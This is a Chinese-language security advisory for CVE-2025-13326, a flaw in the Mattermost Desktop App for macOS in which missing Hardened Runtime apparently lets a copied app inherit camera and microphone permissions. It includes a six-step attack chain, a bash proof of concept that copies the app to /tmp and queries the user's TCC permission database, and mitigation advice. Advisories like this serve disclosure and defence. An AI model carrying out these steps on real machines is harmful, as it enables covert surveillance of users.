CVE-2025-13326 Mattermost Desktop App未启用Hardened Runtime导致TCC权限继承漏洞

漏洞信息

漏洞编号

CVE-2025-13326

漏洞类型

权限配置缺陷

CVSS评分

3.9 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Mattermost Desktop App

漏洞概述

Mattermost Desktop App 6.0.0之前的版本在打包为Mac App Store分发版本时，未能启用macOS的Hardened Runtime安全机制。Hardened Runtime是苹果公司为增强macOS应用安全性而引入的关键特性，它通过限制进程的系统级访问权限来防止恶意代码执行和权限滥用。当Hardened Runtime被禁用时，攻击者可以通过将应用程序二进制文件复制到临时文件夹，然后利用复制后的文件继承原始应用程序的TCC（Transparency, Consent, and Control）权限。TCC是macOS的核心权限管理系统，控制着应用程序对敏感系统资源如摄像头、麦克风、照片库、位置服务和日历等的访问。由于Mattermost Desktop App通常会请求摄像头和麦克风权限以支持团队协作功能，攻击者可以利用此漏洞在用户不知情的情况下获取这些敏感权限，从而进行未授权的监控或数据窃取。此漏洞的利用需要攻击者已经具有本地访问权限，并且需要用户进行一定的交互操作才能完成攻击链。

技术细节

该漏洞的根本原因在于Mattermost Desktop App在Mac App Store分发渠道中未正确配置应用的运行时安全策略。Hardened Runtime通过在进程级别实施严格的代码签名和权限沙箱机制来提供额外的安全保护。当应用程序启用Hardened Runtime时，操作系统会强制执行以下限制：1) 禁止注入动态库代码；2) 禁用调试器附加；3) 限制对系统敏感框架的访问；4) 强制执行代码签名验证。在未启用Hardened Runtime的情况下，攻击者可以将已签名的Mattermost应用二进制文件复制到任意位置（如/tmp目录），由于代码签名仍然有效，复制后的应用可以继承原始应用的TCC权限数据库条目。这意味着攻击者无需重新申请用户授权即可访问之前用户已授予的权限。攻击者可能利用这些权限访问用户的摄像头和麦克风进行监控，或者访问存储的文件和位置数据。此漏洞属于CWE-269（权限分配不当）的子类，CVSS 3.1评分3.9分，主要影响机密性和完整性，影响程度均为低。

攻击链分析

STEP 1

步骤1

攻击者获得目标系统的本地访问权限，能够读取应用程序目录

STEP 2

步骤2

攻击者识别系统中安装的Mattermost Desktop App，该应用具有TCC权限（如摄像头、麦克风访问权限）

STEP 3

步骤3

攻击者将Mattermost应用的二进制文件及其相关资源复制到临时文件夹（如/tmp/mattermost/）

STEP 4

步骤4

由于应用未启用Hardened Runtime，复制后的应用可以保留原有的代码签名和TCC权限条目

STEP 5

步骤5

攻击者执行复制后的Mattermost应用，此时应用可以访问用户之前已授权的敏感资源（如摄像头、麦克风）

STEP 6

步骤6

攻击者利用获取的权限进行未授权的数据收集或监控活动，整个过程无需用户重新授权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-13326 PoC - Mattermost Desktop App TCC Permission Inheritance
# This script demonstrates how Hardened Runtime bypass allows TCC permission inheritance

MATERMOST_APP="/Applications/Mattermost.app"
TEMP_DIR="/tmp/mattermost_poc_$$/Mattermost.app"

echo "=== CVE-2025-13326 PoC ==="
echo "Target: Mattermost Desktop App < 6.0.0"
echo "Vulnerability: TCC Permission Inheritance via Hardened Runtime Bypass"
echo ""

# Step 1: Check if Mattermost is installed
if [ ! -d "$MATERMOST_APP" ]; then
    echo "[-] Mattermost Desktop App not found at $MATERMOST_APP"
    exit 1
fi
echo "[+] Found Mattermost Desktop App"

# Step 2: Check if Hardened Runtime is enabled
codesign_result=$(codesign -d "$MATERMOST_APP" 2>&1)
echo "[i] Code signature info: $codesign_result"

# Check for hardened runtime entitlement
if codesign -d -v "$MATERMOST_APP" | grep -q "runtime"; then
    echo "[+] Hardened Runtime appears to be enabled"
    echo "[-] System may not be vulnerable"
else
    echo "[-] Hardened Runtime NOT enabled - System is VULNERABLE"
fi

# Step 3: Copy application to temp directory (simulating attack)
echo ""
echo "[*] Simulating attack: Copying app to temp directory..."
mkdir -p "/tmp/mattermost_poc_$$/"
cp -R "$MATERMOST_APP" "$TEMP_DIR"

if [ $? -eq 0 ]; then
    echo "[+] Successfully copied Mattermost to $TEMP_DIR"
    echo "[i] The copied app may inherit TCC permissions from the original"
    echo "[i] This allows an attacker to access camera/mic without new authorization"
else
    echo "[-] Failed to copy application"
fi

# Step 4: Check TCC permissions
echo ""
echo "[*] Checking TCC permissions for Mattermost..."
sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db \
    "SELECT client, service, auth_value FROM access WHERE client LIKE '%Mattermost%';" 2>/dev/null

# Cleanup
echo ""
echo "[*] Cleaning up..."
rm -rf "/tmp/mattermost_poc_$$/"
echo "[+] Done"
echo ""
echo "=== Remediation ==="
echo "Upgrade to Mattermost Desktop App >= 6.0.0"
echo "Ensure Hardened Runtime is enabled in production builds"

影响范围

Mattermost Desktop App < 6.0.0 (Mac App Store版本)

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 限制用户对本机应用程序目录的写入权限；2) 监控/tmp目录下的异常应用复制行为；3) 使用Endpoint Detection and Response (EDR)工具监控TCC权限的异常访问；4) 考虑使用企业移动设备管理(MDM)解决方案强制执行应用程序安全策略；5) 提醒用户不要将未知来源的应用程序复制到系统目录运行。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13326
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13326
3 Details https://www.cvedetails.com/cve/CVE-2025-13326/
4 VulDB https://vuldb.com/cve/CVE-2025-13326
5 Link https://mattermost.com/security-updates